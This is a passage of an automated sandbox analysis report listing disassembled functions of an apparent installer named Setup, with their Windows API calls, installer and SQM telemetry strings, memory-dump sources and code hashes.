                                                                                              • Opcode Fuzzy Hash: 876b4cd0803108691802b36d900625dedc8dda483025abb4d6da22b8180a7076
                                                                                              • Instruction Fuzzy Hash: EE11E032241350AFCB448F99CC08F8B3ABDBB85316B170540F924C2951C730E8858BAD
                                                                                              Function 6C5D2724 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,00000000,6C5F0180,?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30), ref: 6C5D2732
                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 6C5D2748
                                                                                              • FreeLibrary.KERNEL32(00000000,?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?), ref: 6C5D2761
                                                                                              • GetLastError.KERNEL32(?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?), ref: 6C5DF9D0
                                                                                              • GetLastError.KERNEL32(?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?), ref: 6C5DFA0D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                              • API String ID: 1529210728-3024904723
                                                                                              • Opcode ID: fc29a4fde76ff99380080c38c1f47b566de63009a7e3dc114eafad1db5bfa117
                                                                                              • Instruction ID: cb2d1d689653566ef24dd0275610fc8f6ad8a619e5ddedde626f51361d506a93
                                                                                              • Opcode Fuzzy Hash: fc29a4fde76ff99380080c38c1f47b566de63009a7e3dc114eafad1db5bfa117
                                                                                              • Instruction Fuzzy Hash: B911E132201341ABCB959B59CD48E9B3BB9FB86396B434051F924C6961C730EC448F6D
                                                                                              Function 63959B4C Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63959B53
                                                                                                • Part of subcall function 6394C3BC: __EH_prolog3.LIBCMT ref: 6394C3C3
                                                                                                • Part of subcall function 6394C3BC: GetCommandLineW.KERNEL32(0000001C,63959B69,?,00000008,6395A8A4), ref: 6394C3C8
                                                                                              Strings
                                                                                              • IDS_ROLLBACK_PROGRESS_BAR_HEADER, xrefs: 63959B9C
                                                                                              • IDS_CREATE_LAYOUT_PROGRESS_BAR_HEADER, xrefs: 63959B87
                                                                                              • IDS_UNINSTALL_PROGRESS_BAR_HEADER, xrefs: 63959B95
                                                                                              • IDS_INSTALL_PROGRESS_BAR_HEADER, xrefs: 63959B5F
                                                                                              • IDS_UNINSTALLPATCH_PROGRESS_BAR_HEADER, xrefs: 63959B80
                                                                                              • IDS_REPAIR_PROGRESS_BAR_HEADER, xrefs: 63959B8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandLine
                                                                                              • String ID: IDS_CREATE_LAYOUT_PROGRESS_BAR_HEADER$IDS_INSTALL_PROGRESS_BAR_HEADER$IDS_REPAIR_PROGRESS_BAR_HEADER$IDS_ROLLBACK_PROGRESS_BAR_HEADER$IDS_UNINSTALLPATCH_PROGRESS_BAR_HEADER$IDS_UNINSTALL_PROGRESS_BAR_HEADER
                                                                                              • API String ID: 1384747822-3246460586
                                                                                              • Opcode ID: 9b4aa51e76f2b4394e446039d6914b27d301f34aa5ba557a1932b199e733a8a4
                                                                                              • Instruction ID: b24343afe53adf7162d529f420feee6175d961f47be495e0dd66235289390acf
                                                                                              • Opcode Fuzzy Hash: 9b4aa51e76f2b4394e446039d6914b27d301f34aa5ba557a1932b199e733a8a4
                                                                                              • Instruction Fuzzy Hash: B9018FF242070B8BFB20DF7CC6456693676FB9AF79F980509F010AB285DA32D5A08F11
                                                                                              Function 6C5D247C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(advapi32,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D2484
                                                                                              • GetProcAddress.KERNEL32(00000000,TraceMessage), ref: 6C5D24A1
                                                                                              • GetProcAddress.KERNEL32(00000000,TraceMessageVa), ref: 6C5D24C0
                                                                                              • FreeLibrary.KERNEL32(00000000,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D24D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryProc$FreeLoad
                                                                                              • String ID: TraceMessage$TraceMessageVa$advapi32
                                                                                              • API String ID: 2256533930-3542275927
                                                                                              • Opcode ID: 75157431c5970b5d6e2cc6fb5f751df54769fcd73ab22c6db0d76d2040b36fb6
                                                                                              • Instruction ID: 3ff80364aff62007c737d1ce69be288d32caff16817e5443891288da62b15e06
                                                                                              • Opcode Fuzzy Hash: 75157431c5970b5d6e2cc6fb5f751df54769fcd73ab22c6db0d76d2040b36fb6
                                                                                              • Instruction Fuzzy Hash: CBF04F726013919BCF888B6CAD49B573BF8B7C6765B9B011BE828C2A05C77094419F6C
                                                                                              Function 6394E9B3 Relevance: 12.1, APIs: 8, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CallNextHookEx.USER32(?,00000005,?,?), ref: 6394E9CF
                                                                                              • UnhookWindowsHookEx.USER32(?), ref: 6394E9FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Hook$CallNextUnhookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 969045306-0
                                                                                              • Opcode ID: 33d97b4016e0fd1ffd07de1c0738f71c0ab4645b7d1a106a3d8d96e583adc05e
                                                                                              • Instruction ID: a05d54123b88de78016993d2d078f2b01605702864e03f3ce4a552ef4769accd
                                                                                              • Opcode Fuzzy Hash: 33d97b4016e0fd1ffd07de1c0738f71c0ab4645b7d1a106a3d8d96e583adc05e
                                                                                              • Instruction Fuzzy Hash: 10415B31A40B09EFEB10EF28C888E9977B9FF02B55F148514F465DA1A2D331E954CF00
                                                                                              Function 63950B43 Relevance: 12.1, APIs: 8, Instructions: 77windowkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyState.USER32(00000010), ref: 63950B58
                                                                                              • GetParent.USER32 ref: 63950B79
                                                                                              • GetParent.USER32 ref: 63950B8C
                                                                                              • SendMessageW.USER32(00000000,000006DB,00000000,00000000), ref: 63950B9E
                                                                                              • GetParent.USER32(?), ref: 63950BDB
                                                                                              • SendMessageW.USER32(00000000,000006DA,00000000,00000000), ref: 63950BEF
                                                                                              • GetParent.USER32(000000FF), ref: 63950BFA
                                                                                              • SendMessageW.USER32(00000000,000006DD,000000FF,000000FF), ref: 63950C08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Parent$MessageSend$State
                                                                                              • String ID:
                                                                                              • API String ID: 1493399426-0
                                                                                              • Opcode ID: 3524e43cf1364cdddfbc0382ca69dc123dd733160d3c124181f21fc919820654
                                                                                              • Instruction ID: 7c4f37caefdc569d51fdbdc8a3b0be1249dddef3a0ea88ca8c6b111db19114c2
                                                                                              • Opcode Fuzzy Hash: 3524e43cf1364cdddfbc0382ca69dc123dd733160d3c124181f21fc919820654
                                                                                              • Instruction Fuzzy Hash: 2821AE34904209BFEF11EBA4CC4AB9DBFB8EB027ADF108254F161AA1E1D7749661CF50
                                                                                              Function 6C5D17EB Relevance: 12.1, APIs: 8, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • malloc.MSVCRT ref: 6C5D17F6
                                                                                              • _callnewh.MSVCRT ref: 6C5E4473
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E44AC
                                                                                              • _CxxThrowException.MSVCRT(00000001,6C5EE290), ref: 6C5E44BA
                                                                                              • _callnewh.MSVCRT ref: 6C5E44C3
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E44FC
                                                                                              • _CxxThrowException.MSVCRT(00000001,6C5EE290), ref: 6C5E450A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionThrow_callnewhstd::bad_exception::bad_exception$malloc
                                                                                              • String ID:
                                                                                              • API String ID: 2452255883-0
                                                                                              • Opcode ID: 8eca3809b62caa4370d656490e4a7dae9b74aae29612f411f7fea02f3214ea25
                                                                                              • Instruction ID: 9dfdc407bf4866f328916fe1bf8f49170b5fa8f5277aaff51dc46152c8914a48
                                                                                              • Opcode Fuzzy Hash: 8eca3809b62caa4370d656490e4a7dae9b74aae29612f411f7fea02f3214ea25
                                                                                              • Instruction Fuzzy Hash: 8411E932A0421CA6DF0997B0EC459DE3F799FC831CF154455EC21E5D51EFB1DE0A9690
                                                                                              Function 6C5DA2A6 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 452fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • CreateFileW.KERNEL32(6C5DACC8,C0000000,00000000,00000000,00000001,00000002,00002080,00000000,00000000,?,00000000,00000010,?,00000000,00000010,00000094), ref: 6C5DA465
                                                                                              • WriteFile.KERNEL32(000003E0,00000000,?,6C5DACC8,00000000,?,?), ref: 6C5DA488
                                                                                              • CloseHandle.KERNEL32(000003E0,?,?), ref: 6C5DA4A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleWritemalloc
                                                                                              • String ID: x
                                                                                              • API String ID: 4113784837-2363233923
                                                                                              • Opcode ID: 373afd6dd4eb0f0f6b7c336daadb8d901aac65d0c43243932ab57a773181adea
                                                                                              • Instruction ID: 681781a582b535fc1f1fbdb2d4645fa16e2456a5ecf01bdd8aff7990d05c2bc2
                                                                                              • Opcode Fuzzy Hash: 373afd6dd4eb0f0f6b7c336daadb8d901aac65d0c43243932ab57a773181adea
                                                                                              • Instruction Fuzzy Hash: AD02AE309413599FDB15CF88CC85FAF7BB5BB49318F224599E920ABA61C331ED84CB54
                                                                                              Function 639548B6 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639548BD
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 63951F81: __EH_prolog3.LIBCMT ref: 63951F88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Drive1$Drive2$Drive3$Placement$Text
                                                                                              • API String ID: 431132790-3260609399
                                                                                              • Opcode ID: 82d5f5731c55b29e30ca54c4fadfb99e721469887342cc756751527240cfe7ae
                                                                                              • Instruction ID: bcf3f9409c3d2df40fbfe4e1a905df14996e9e8dd4bcd54184e53ad51809950d
                                                                                              • Opcode Fuzzy Hash: 82d5f5731c55b29e30ca54c4fadfb99e721469887342cc756751527240cfe7ae
                                                                                              • Instruction Fuzzy Hash: 9B714D71905248DFEB00DBE8C944BDEBBB8AF29B18F184198F514E7282CB35DA45DF61
                                                                                              Function 63957FE0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957FE7
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • PathGetDriveNumberW.SHLWAPI(?,?,?,00000014,63959180,?,?,?,?,?,?,?,?), ref: 63958015
                                                                                              • PathGetDriveNumberW.SHLWAPI(?), ref: 6395801C
                                                                                              • PathGetDriveNumberW.SHLWAPI(?,?,?,?), ref: 63958064
                                                                                              • PathGetDriveNumberW.SHLWAPI(?), ref: 6395806B
                                                                                              • PathGetDriveNumberW.SHLWAPI(00000001,00000001,?,?), ref: 639580B3
                                                                                              • PathGetDriveNumberW.SHLWAPI(?), ref: 639580BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DriveNumberPath$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 2285536258-0
                                                                                              • Opcode ID: b8f9ceb3eca95ab724989acedfa5a5e9430b8bd8265802cec882478b017f9e2f
                                                                                              • Instruction ID: 0a5218f0e77690a73d42a97b8f41ab681f26bd0412be6b708919289832379418
                                                                                              • Opcode Fuzzy Hash: b8f9ceb3eca95ab724989acedfa5a5e9430b8bd8265802cec882478b017f9e2f
                                                                                              • Instruction Fuzzy Hash: AA81F7759043099FCB04DF68C48499DBBB1FF49738B29C599E858AB3A1C731E991CF90
                                                                                              Function 6C5DE1A5 Relevance: 10.7, APIs: 7, Instructions: 169threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C5DE1F0
                                                                                              • GetThreadPriority.KERNEL32(00000000,?,6C5DBFF6,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5DE1F3
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C5DE201
                                                                                              • SetThreadPriority.KERNEL32(00000000,?,6C5DBFF6,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5DE204
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C5DE313
                                                                                              • SetThreadPriority.KERNEL32(00000000,?,6C5DBFF6,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5DE31A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CurrentPriority
                                                                                              • String ID:
                                                                                              • API String ID: 1343868529-0
                                                                                              • Opcode ID: dfda4ccb6d2e3af210f7bb52f6b7ed5530dab6e3f248c261db3429e2b962b65a
                                                                                              • Instruction ID: 53511f9760f657b6335696bf3100c1e2554fda2764ddbbb0baf2bc20ceb31858
                                                                                              • Opcode Fuzzy Hash: dfda4ccb6d2e3af210f7bb52f6b7ed5530dab6e3f248c261db3429e2b962b65a
                                                                                              • Instruction Fuzzy Hash: 62519030A002949BCB15DF28CC88E99B7F6AB89344F560499F159D7B50C7B0EDC4CF98
                                                                                              Function 6C5D4197 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(Winhttp.dll), ref: 6C5D41C6
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6C5D41D5
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,?,?,?,?,?), ref: 6C5D41F9
                                                                                                • Part of subcall function 6C5D4281: memset.MSVCRT ref: 6C5D42CF
                                                                                                • Part of subcall function 6C5D4281: EnterCriticalSection.KERNEL32(00000030,?,00000104,?,80000002,Software\Microsoft\SQMClient,DoNotDeleteFileAfterUpload,?,00000000,?,6C5F0168), ref: 6C5D434C
                                                                                                • Part of subcall function 6C5D4281: FindFirstFileW.KERNEL32(?,?,?,6C5F0168), ref: 6C5D4392
                                                                                                • Part of subcall function 6C5D4281: LeaveCriticalSection.KERNEL32(?,?,6C5F0168), ref: 6C5D43CD
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 6C5D424A
                                                                                              • SetLastError.KERNEL32(00000000,?,?,?), ref: 6C5D4253
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeaveLibrary$ErrorFileFindFirstFreeLastLoadmemset
                                                                                              • String ID: Winhttp.dll
                                                                                              • API String ID: 4214541343-1936088768
                                                                                              • Opcode ID: 848bdb6ab4869d5e71ff47b52c6d9cf2bb527ffc054eca157d409f9b70cb8baa
                                                                                              • Instruction ID: c737f089e59645e49148b202bd72a5b8e322aba8d429027c5baa4eca77d8b5f8
                                                                                              • Opcode Fuzzy Hash: 848bdb6ab4869d5e71ff47b52c6d9cf2bb527ffc054eca157d409f9b70cb8baa
                                                                                              • Instruction Fuzzy Hash: CC51F131245380EBCB45DF5CCC84FAA7AB5BB82358F670456F925DADA1C3B1E8848F58
                                                                                              Function 6C5D583D Relevance: 10.6, APIs: 7, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5D5875
                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 6C5D58A7
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 6C5E2890
                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000012,6C5E5B28,00000000), ref: 6C5E28C6
                                                                                              • GetLastError.KERNEL32 ref: 6C5E28D1
                                                                                              • GetLastError.KERNEL32 ref: 6C5E294D
                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000011,6C5E5B28,00000000), ref: 6C5E2967
                                                                                                • Part of subcall function 6C5D58E8: GetFileAttributesW.KERNEL32(6C5D5892,?,6C5D5892,00000000), ref: 6C5D58F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Path$AttributesCreateDirectoryFileLongNameTemp
                                                                                              • String ID:
                                                                                              • API String ID: 4207547965-0
                                                                                              • Opcode ID: 32c47991f0299aa789022e533d97f38132653f1dfebae897be48f538ca4cde46
                                                                                              • Instruction ID: 6dd0b867a507691da761e3df37ac1aeb5482eb95a7afbb87700d0fc3bddb0a80
                                                                                              • Opcode Fuzzy Hash: 32c47991f0299aa789022e533d97f38132653f1dfebae897be48f538ca4cde46
                                                                                              • Instruction Fuzzy Hash: B541B030241315ABCB159B558C48F9A3BF8EF4D358FA24452F825DAA61C371D8C48F69
                                                                                              Function 6C5E853A Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E8568
                                                                                                • Part of subcall function 6C5E8316: LocalFree.KERNEL32(?), ref: 6C5E8527
                                                                                                • Part of subcall function 6C5E8097: memset.MSVCRT ref: 6C5E80D6
                                                                                                • Part of subcall function 6C5E8097: memset.MSVCRT ref: 6C5E80EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$FreeLocal
                                                                                              • String ID: *.psqm$*.sqm$CabSessionAfterSize$Microsoft\Windows\Sqm\Sessions$Microsoft\Windows\Sqm\Upload$Software\Microsoft\SQMClient\Windows
                                                                                              • API String ID: 1741899810-2150350095
                                                                                              • Opcode ID: 3bad25c55a68ab9d6a3b9021d295568c143bd2a1e8cc4f26575fe2568646cde1
                                                                                              • Instruction ID: 50403fb065b02a6ae50b03bde4266bea2d7ad230dc0041018ef9d68c60bdb8db
                                                                                              • Opcode Fuzzy Hash: 3bad25c55a68ab9d6a3b9021d295568c143bd2a1e8cc4f26575fe2568646cde1
                                                                                              • Instruction Fuzzy Hash: FF310631601384AACB059A5C8CD4FBA37F9ABDD30CF7904ABE525D6E51C361CC498B52
                                                                                              Function 6C5D7B37 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D7B80
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
